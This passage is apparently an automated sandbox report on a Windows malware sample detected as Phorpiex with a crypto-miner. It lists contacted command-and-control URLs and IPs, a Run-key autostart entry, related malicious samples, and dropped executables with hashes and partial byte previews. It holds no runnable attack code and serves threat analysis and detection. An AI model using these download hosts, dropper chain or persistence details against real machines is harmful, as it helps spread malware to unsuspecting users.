                  • Avira URL Cloud: safe
                  		unknown
                  http://twizt.net/peinstall.phpvPOLM94OE0VNK.exe, 00000000.00000002.1476552033.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://twizt.net/newtpp.exeLM94OE0VNK.exe, 00000000.00000002.1476552033.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000085E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://twizt.net/peinstall.phpLM94OE0VNK.exefalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  185.215.113.66
                  		twizt.netPortugal
                  		206894WHOLESALECONNECTIONSNLtrue
                  217.30.162.161
                  		unknownUzbekistan
                  		39032ISPETCUZfalse
                  178.22.172.2
                  		unknownKazakhstan
                  		41798TTC-ASJSCTranstelecomKZfalse
                  239.255.255.250
                  		unknownReserved
                  		unknownunknownfalse
                  90.156.160.6
                  		unknownRussian Federation
                  		25532MASTERHOST-ASMoscowRussiaRUtrue
                  91.202.233.141
                  		unknownRussian Federation
                  		9009M247GBfalse
                  80.191.218.209
                  		unknownIran (ISLAMIC Republic Of)
                  		58224TCIIRtrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1564700
                  Start date and time:2024-11-28 18:17:17 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 14s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:18
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:LM94OE0VNK.exe
                  renamed because original name is a hash value
                  Original Sample Name:8ce09f13942ab5bcb81b175996c8385f.exe
                  Detection:MAL
                  Classification:mal100.evad.winEXE@20/10@1/7
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 69
                  • Number of non-executed functions: 152
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded IPs from analysis (whitelisted): 20.109.209.108
                  • Excluded domains from analysis (whitelisted): redir.update.msft.com.trafficmanager.net, slscr.update.microsoft.com, www.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: LM94OE0VNK.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  12:18:37API Interceptor2x Sleep call for process: sysnldcvmr.exe modified
                  18:18:37AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Windows\sysnldcvmr.exe

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  185.215.113.66U9jAFGWgPG.exeGet hashmaliciousPhorpiex, XmrigBrowse
                  • 185.215.113.66/5
                  ukOlLduCBM.exeGet hashmaliciousPhorpiex, XmrigBrowse
                  • 185.215.113.66/5
                  Bjl3geiFEK.exeGet hashmaliciousPhorpiexBrowse
                  • 185.215.113.66/2
                  T52Z708x2p.exeGet hashmaliciousPhorpiex, XmrigBrowse
                  • 185.215.113.66/1
                  lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                  • 185.215.113.66/2
                  Us051y7j25.exeGet hashmaliciousPhorpiex, XmrigBrowse
                  • 185.215.113.66/5
                  thcdVit1dX.exeGet hashmaliciousPhorpiexBrowse
                  • 185.215.113.66/3
                  bBcZoComLl.exeGet hashmaliciousPhorpiex, XmrigBrowse
                  • 185.215.113.66/4
                  file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                  • 185.215.113.66/5
                  dgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse
                  • 185.215.113.66/5
                  217.30.162.161lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                    lRT1FK9PcL.exeGet hashmaliciousPhorpiexBrowse
                      H6uKtOX196.exeGet hashmaliciousPhorpiex, XmrigBrowse
                        yBIZ7wHvEC.exeGet hashmaliciousPhorpiexBrowse
                          239.255.255.250file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                            file.exeGet hashmaliciousCryptbotBrowse
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                https://application-workspace.com/red-bull/id-38772Get hashmaliciousUnknownBrowse
                                  https://share.fremontpeak.org/___.YzJ1OmNvZ2l3ZWIyOmM6bzpiNTEyZDAxNmZiN2I1MjU1MmE3OTQzOTdiZmE2NWEzZjo3OmQ0ZjU6ZDQ4OTQ1MWM1NjM2NzgxOWI0N2UyODgzNmYwYzIzOTkxYjZmOTA5ZjUyY2M5MTJiN2UzZTBiMmYwOTQ5NzhhNTpoOlQ6TgGet hashmaliciousUnknownBrowse
                                    https://www.google.rs/url?q=792CHARtTPSJ3J3wDyycT&sa=t&esrc=gxOmmFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=HARlDJVS0YXpPkDfJ6C&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/ezraandhermes.com/bdman/authfyz//ylJB8Cet6FqlPfuIplTD1PwC/Z3JlZ29yeS5jYXJsdWNjaUBtYWxsaW5ja3JvZHQuY29tGet hashmaliciousUnknownBrowse
                                      file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                        file.exeGet hashmaliciousCryptbotBrowse
                                          http://theluckyhouse.vn/dnkdlGet hashmaliciousUnknownBrowse
                                            http://englobe.infralogin.com/passresetconfirm/ODA0MDY/6qb-fdbad004345ade5cc1bb/Get hashmaliciousUnknownBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              twizt.netU9jAFGWgPG.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 185.215.113.66
                                              ukOlLduCBM.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 185.215.113.66
                                              T52Z708x2p.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 185.215.113.66
                                              thcdVit1dX.exeGet hashmaliciousPhorpiexBrowse
                                              • 185.215.113.66
                                              dgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 185.215.113.66
                                              SecuriteInfo.com.Trojan.DownLoader46.2135.13298.13900.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 185.215.113.66
                                              qRavA0Sorz.exeGet hashmaliciousUnknownBrowse
                                              • 185.215.113.66
                                              qRavA0Sorz.exeGet hashmaliciousUnknownBrowse
                                              • 185.215.113.66
                                              SecuriteInfo.com.Trojan.DownLoader46.63386.25844.4041.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 185.215.113.66
                                              SecuriteInfo.com.Trojan.DownLoader46.2135.7325.13890.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 185.215.113.66

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              ISPETCUZbotx.m68k.elfGet hashmaliciousMiraiBrowse
                                              • 217.30.172.162
                                              U9jAFGWgPG.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 217.30.171.37
                                              mips.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 217.30.172.111
                                              T52Z708x2p.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 87.237.236.86
                                              lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 217.30.162.161
                                              file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 89.236.218.158
                                              dgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 217.30.162.37
                                              GGXhCiYFBw.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 217.30.163.15
                                              file.exeGet hashmaliciousPhorpiexBrowse
                                              • 217.30.160.219
                                              SecuriteInfo.com.Trojan.DownLoader46.2135.11116.25434.exeGet hashmaliciousPhorpiexBrowse
                                              • 87.237.236.86
                                              TTC-ASJSCTranstelecomKZukOlLduCBM.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 178.22.171.158
                                              Us051y7j25.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 178.22.171.158
                                              SecuriteInfo.com.Win32.Sector.30.15961.3704.exeGet hashmaliciousSalityBrowse
                                              • 178.22.169.142
                                              n5h5BaL8q0.exeGet hashmaliciousSality, XWormBrowse
                                              • 178.22.169.142
                                              SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                              • 178.22.169.142
                                              HZcInD4qL2.elfGet hashmaliciousUnknownBrowse
                                              • 94.141.238.249
                                              xJd712XMG6.exeGet hashmaliciousPhorpiexBrowse
                                              • 94.141.249.222
                                              file.exeGet hashmaliciousPhorpiexBrowse
                                              • 87.255.212.22
                                              TGmAf3feA5.elfGet hashmaliciousMiraiBrowse
                                              • 94.141.238.240
                                              kMQbvSnfVa.elfGet hashmaliciousUnknownBrowse
                                              • 2.57.112.230
                                              MASTERHOST-ASMoscowRussiaRUsanti.exeGet hashmaliciousFormBookBrowse
                                              • 90.156.201.74
                                              arm.nn-20241122-0008.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 217.16.29.179
                                              arm4.elfGet hashmaliciousMiraiBrowse
                                              • 84.252.144.212
                                              U9jAFGWgPG.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 90.156.163.55
                                              sora.ppc.elfGet hashmaliciousMiraiBrowse
                                              • 90.156.146.158
                                              ukOlLduCBM.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 90.156.163.10
                                              T52Z708x2p.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 90.156.162.79
                                              lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 90.156.160.86
                                              Us051y7j25.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 90.156.160.66
                                              la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                              • 90.156.164.196
                                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                              • 185.215.113.16
                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                              • 185.215.113.16
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 185.215.113.206

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Users\user\AppData\Local\Temp\240016073.exeU9jAFGWgPG.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                ukOlLduCBM.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                  T52Z708x2p.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                    lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                      Us051y7j25.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                        thcdVit1dX.exeGet hashmaliciousPhorpiexBrowse
                                                          bBcZoComLl.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                            file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                              dgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                GGXhCiYFBw.exeGet hashmaliciousPhorpiex, XmrigBrowse

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\240016073.exe.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\240016073.exe
                                                                  File Type:CSV text
                                                                  Category:dropped
                                                                  Size (bytes):425
                                                                  Entropy (8bit):5.357964438493834
                                                                  Encrypted:false
                                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                                                                  MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                                                                  SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                                                                  SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                                                                  SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\gonup[1]

                                                                  Download File
                                                                  Process:C:\Windows\sysnldcvmr.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):81152
                                                                  Entropy (8bit):7.998011911006711
                                                                  Encrypted:true
                                                                  SSDEEP:1536:WvQLn+ioEm71GeGAOGQE7B7OTaVO8w2t0DX98HXp68iBeJ8DlE:EQy8eGetjQEV7o2+L+Xp68TF
                                                                  MD5:62C2757AA18C26E3E62E668C7D7A6BA7
                                                                  SHA1:F67D1852F06F3ECE3192D7DA51A395AE45DDBCD3
                                                                  SHA-256:13833BCC37A158821DAD602493FF4751334191A01EBCB44A345649B7A6F81BE6
                                                                  SHA-512:4D27E9E97920CB84E8CC7DA010F5F4D91837DE6DBFE95253EA900E165884C2A16A712D91B216903BB19A47C4671F80F62CA99BB3828C0204C4C830F464592806
                                                                  Malicious:false
                                                                  Preview:>o?].......W..y...4...........).X.FL.g}M..uu..N......i.....O.O@.$,e63.H.......V..~R..V..Ye..^^|;Q..F.U...9.Vm..?}..X|..!....$?./V.}.....C..Zd......:IU..f.3..wgr...k...v/...v.T.:U..........f.H.4s..,.h..!.,..'...c.#2...'.+.|Sw.......#.. ~8.c..Q..`M.~.@....t^!...H..5.X..o^.....c..+T.g.=....%....Dt4u.].%g.%^.jr...".S.....F.J.(.s.X.sX..w%fO.....m..'1..^(...t.....J..0S.t....BA5.LK:..E.[..k....3R..&.. I..,...@.A..'N.@....97K]....Ag.#..*.,..^['....+B1.V..2..#...U.1..$.3h)V...M(.}.y.4h2.....b.g..(|.#.{N.W.)&^?.r`.......h...b......&.7.$....b....b~.b*..:'....bc...rx.x.&&.`(..De.u....u.5D..y..=..P..e.4<...../..T2Qb1pA9.o...Xe(..R@...L...f........l...,D.W*....J..Z.....h|.....^.W].cf<.P...k.Hk..4.b.....GB..}.z.Q..\[J..q.I....!.znI..V<^q...#..68+.....}!.....{.<Tv.P...i.`..V.......lC&..6.~.#5g@)w..G...........f..9wlr`.....n. .()...3+.(...3.. ...Q...29.........4.A...Y._...x......90r.@:...m..i[72p...............6..y.M.h...c9%nU.).b.H...6......>..l

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\1[1]

                                                                  Download File
                                                                  Process:C:\Windows\sysnldcvmr.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):8960
                                                                  Entropy (8bit):7.980118959451248
                                                                  Encrypted:false
                                                                  SSDEEP:192:8w3f/H9pFkeMpRmPIlHDCEkAH5gWPmEt3TXxl/6LkbgewuNvm:8snHrUVjbHH5g+mEt3z64bdNvm
                                                                  MD5:39F45EDB23427EBF63197CA138DDB282
                                                                  SHA1:4BE1B15912C08F73687C0E4C74AF0979C17FF7D5
                                                                  SHA-256:77FBB0D8630024634880C37DA59CE57D1B38C7E85BDCC14C697DB9E79C24E0DE
                                                                  SHA-512:410F6BAAD25B256DAEBFA5D8B8A495429C9E26E7DE767B2A0E6E4A75E543B77DBD0ABCA0335FB1F0D91E49E292B42CEDC6EDD72D25A3C4C62330E2B31C054CC6
                                                                  Malicious:false
                                                                  Preview:$.g.r5].F.M[..o.I.........5.Eb....L6,.i%.kZ.....8....ePI|.....<..iq....#.......O@5..U|*{`)...].H........x..-..dR~A.}"2......... +.(.*.R.m....d...!..(...$..5.t...F.]...<.g"...V.(1}.]C........s3..76..&...Ic...%t..h.I.b.....R(......}..IE...<.....]..C.....9....xi|........../.....>y..4m..3..hO.....;...<.|..5.,.0.tA`.J..Nn;.w.es...q.T.._...:<....fb7..J.H.3&. ...f..1.F.G.c..&k..,J..x+..c.`.w....s....~.........(s..F..IT...,....5\.).}..-..@........4.>a.u...e.\..v.=.I.kB..[..Q...2..c.LA.lT..rO.....U.Y..*m.j#.u...U..P...>.Y{,...Tk....3.h.,v..)..P.TK3_.+..+....m..NP[..qe.......G9.f..|........[.-&M~&..14w.._.l.a./.ok...w.M.._...w..^7Rgg....%.Tv...}....T..p...;d.Su..z.FPH...Z....I...pz5...0g..`..l..K\V3...t..r.y.l...2..R.]?cz.m....v....o.......\. ....0.o.N3.a.P..V.=BE\..... _.^hV.f.\*..n.$0..q.C........7..BQ.n...}c..../.Yd=.G...-.....T.Sx..&...z.wi...:...,.a..........o.ou....Hn...8....Zx...............F^=R...nU.T.D9.'.W..L.dPi.^`ZBj..2.....z.\.

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\newtpp[1].exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\LM94OE0VNK.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):80896
                                                                  Entropy (8bit):6.424014659383267
                                                                  Encrypted:false
                                                                  SSDEEP:1536:ZwjmKHFmav82kFifdWXwCsgTT+vr3Rzmxwz6fYc6on:+6tOMFif3CsKavr0xwz6gc6on
                                                                  MD5:0C883B1D66AFCE606D9830F48D69D74B
                                                                  SHA1:FE431FE73A4749722496F19B3B3CA0B629B50131
                                                                  SHA-256:D921FC993574C8BE76553BCF4296D2851E48EE39B958205E69BDFD7CF661D2B1
                                                                  SHA-512:C047452A23EFAD4262479FBFEB5E23F9497D7CEFD4CBB58E869801206669C2A0759698C70D18050316798D5D939B989537FDCE3842AA742449F5E08ED7FA60A5
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L.....3g.....................d.......u............@..........................p...............................................$.......................................................................................................................text............................... ..`.rdata...3.......4..................@..@.data...(/...@... ..................@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\2374323789.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\LM94OE0VNK.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):80896
                                                                  Entropy (8bit):6.424014659383267
                                                                  Encrypted:false
                                                                  SSDEEP:1536:ZwjmKHFmav82kFifdWXwCsgTT+vr3Rzmxwz6fYc6on:+6tOMFif3CsKavr0xwz6gc6on
                                                                  MD5:0C883B1D66AFCE606D9830F48D69D74B
                                                                  SHA1:FE431FE73A4749722496F19B3B3CA0B629B50131
                                                                  SHA-256:D921FC993574C8BE76553BCF4296D2851E48EE39B958205E69BDFD7CF661D2B1
                                                                  SHA-512:C047452A23EFAD4262479FBFEB5E23F9497D7CEFD4CBB58E869801206669C2A0759698C70D18050316798D5D939B989537FDCE3842AA742449F5E08ED7FA60A5
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L.....3g.....................d.......u............@..........................p...............................................$.......................................................................................................................text............................... ..`.rdata...3.......4..................@..@.data...(/...@... ..................@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\240016073.exe

                                                                  Download File
                                                                  Process:C:\Windows\sysnldcvmr.exe
                                                                  File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):8704
                                                                  Entropy (8bit):5.0125514402992275
                                                                  Encrypted:false
                                                                  SSDEEP:192:Otk3w0++KjlRC5vVkDlBj9k2cugyJBLCsZ:OEYjlRAGlBj9kSgiLC0
                                                                  MD5:CB8420E681F68DB1BAD5ED24E7B22114
                                                                  SHA1:416FC65D538D3622F5CA71C667A11DF88A927C31
                                                                  SHA-256:5850892F67F85991B31FC90F62C8B7791AFEB3C08AE1877D857AA2B59471A2EA
                                                                  SHA-512:BAAABCC4AD5D409267A34ED7B20E4AFB4D247974BFC581D39AAE945E5BF8A673A1F8EACAE2E6783480C8BAAEB0A80D028274A202D456F13D0AF956AFA0110FDF
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                  Joe Sandbox View:
                                                                  • Filename: U9jAFGWgPG.exe, Detection: malicious, Browse
                                                                  • Filename: ukOlLduCBM.exe, Detection: malicious, Browse
                                                                  • Filename: T52Z708x2p.exe, Detection: malicious, Browse
                                                                  • Filename: lJ4EzPSKMj.exe, Detection: malicious, Browse
                                                                  • Filename: Us051y7j25.exe, Detection: malicious, Browse
                                                                  • Filename: thcdVit1dX.exe, Detection: malicious, Browse
                                                                  • Filename: bBcZoComLl.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: dgiX55cHyU.exe, Detection: malicious, Browse
                                                                  • Filename: GGXhCiYFBw.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....=d.........."...................... .....@..... .......................`............@...@......@............... ...............................@..(............................................................................................ ..H............text........ ...................... ..`.rsrc...(....@......................@..@.reloc.......`......."..............@..BH........#.......................................................................0..i.......r...pr...p(......&..r...pr...p(......&..(......&.. ....(....~.....(.....((....r:..p(....(......&...(....*....4...................%........(../........<.#_.......0..:.......s.......o......o.....(....o......o......o.....(....&..&..*..........66.......0..\..................rt..p....s.....(.........+6........o....o....r...p(....(...+.2...o....o.......X.......i2............r...p.........(....(.....

                                                                  C:\Users\user\AppData\Local\Temp\2693731851.exe

                                                                  Download File
                                                                  Process:C:\Windows\sysnldcvmr.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):80896
                                                                  Entropy (8bit):6.424014659383267
                                                                  Encrypted:false
                                                                  SSDEEP:1536:ZwjmKHFmav82kFifdWXwCsgTT+vr3Rzmxwz6fYc6on:+6tOMFif3CsKavr0xwz6gc6on
                                                                  MD5:0C883B1D66AFCE606D9830F48D69D74B
                                                                  SHA1:FE431FE73A4749722496F19B3B3CA0B629B50131
                                                                  SHA-256:D921FC993574C8BE76553BCF4296D2851E48EE39B958205E69BDFD7CF661D2B1
                                                                  SHA-512:C047452A23EFAD4262479FBFEB5E23F9497D7CEFD4CBB58E869801206669C2A0759698C70D18050316798D5D939B989537FDCE3842AA742449F5E08ED7FA60A5
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L.....3g.....................d.......u............@..........................p...............................................$.......................................................................................................................text............................... ..`.rdata...3.......4..................@..@.data...(/...@... ..................@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\tbtcmds.dat

                                                                  Download File
                                                                  Process:C:\Windows\sysnldcvmr.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):285
                                                                  Entropy (8bit):7.28515973169972
                                                                  Encrypted:false
                                                                  SSDEEP:6:Iyu4QX3zGPoJz9fxrQM7j1td6tstnKAC2CooOaJX9laJz/0:IVFXjA8VdXd6YnK9B68
                                                                  MD5:E9ACD9F780983202F14871AF9BDE3399
                                                                  SHA1:A76E45F3B6B86D2EF2757F138A308158985FABBF
                                                                  SHA-256:B4BE18FDC793F59785C72B9F7203B8DDE0221375436C2370DEC83B8243B793DE
                                                                  SHA-512:5967F2D1FEA02A15EF08F3B4243BB2AFFDB0778D803536096A9B7A3C7CF0D3BE5B77DBD1F116FF06FA08B7FB204C51DAB9450E9CC311C4E229194B540EFE6051
                                                                  Malicious:false
                                                                  Preview:.4.9..z....q.|...s..3A.k....,...u.4.....:.C&.;.L.e........9^~..%..T..PL.`S.d.'a;O.......-...E....P\S.>L.x0.L..........F...+T5.5.,.z@.....y.8..xpuS.`4..@#/6r.....E.....l.A?.O..d.gb...-.....\._.....y...-..+.O...>.=i.aR.....r.vn.[..::..08.e..Zl../..Y...t.h^C...)..a....T\..U

                                                                  C:\Users\user\tbtnds.dat

                                                                  Download File
                                                                  Process:C:\Windows\sysnldcvmr.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):4096
                                                                  Entropy (8bit):4.903325145765822
                                                                  Encrypted:false
                                                                  SSDEEP:96:VI7lxpje1/XGuiCk3jc5LdxJvxvWNpvoS7Noz2xGMl/Ug4si:keWCkTc5x4JRoni4P
                                                                  MD5:EFFF03D9B6519B3EFEE1C681CAF49A04
                                                                  SHA1:3F3E615902795B94DA037AAC6F9329A643F52ACB
                                                                  SHA-256:E27462FFBAD619BEB54C6E4AD9A551B82E19F73F463CC7D98DD6891E49A0B7A0
                                                                  SHA-512:2B4F607542291E0ADE883889928EAC9A164A0900117FDA8B1B2759D07E10B0F7CCA04411966E1EAC3A936BBDB16AF78ED7ACD146EC40A66CDDFB1BDAD8C44848
                                                                  Malicious:false
                                                                  Preview:......zT..g...zT......zT;..>..yT.G....yT>....yTZ..g..yT...`..yTV>....yT...m..yT......yTi.....yT.z....yT.A...yTZ..l..yT./....yT...O..yT.................TQ....Y,......f.a......8.R.......R.....q.M...._;.......py;....-..*......|....../.'....m.o.....M........Y.......r......^.D8......g.....\|.........V.....#......../.......%......6......~}....Y........L........9G......I....{......................#@......{E/............^..8....f.P....M,.%....[]........e8.......]..............c......._.....Z..*....f..T....f.......Z..R......l......l\......A:..............~.....%x.........1.....e......Y.......M.w....u.......R.xJ....-.h.......cw......................pR......[W............y.V...._;.......z......_9......U.......^.Ez.....[/=....&......_.W.....]..(....R..A...._:....................................Z..{.......E.....6......|m0.............Z..S....[z.v.....Qf............m......Z..H.......$......f.......'....Z..}....................pB......a......F5.....................{.....].V.....

                                                                  C:\Windows\sysnldcvmr.exe

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\2374323789.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):80896
                                                                  Entropy (8bit):6.424014659383267
                                                                  Encrypted:false
                                                                  SSDEEP:1536:ZwjmKHFmav82kFifdWXwCsgTT+vr3Rzmxwz6fYc6on:+6tOMFif3CsKavr0xwz6gc6on
                                                                  MD5:0C883B1D66AFCE606D9830F48D69D74B
                                                                  SHA1:FE431FE73A4749722496F19B3B3CA0B629B50131
                                                                  SHA-256:D921FC993574C8BE76553BCF4296D2851E48EE39B958205E69BDFD7CF661D2B1
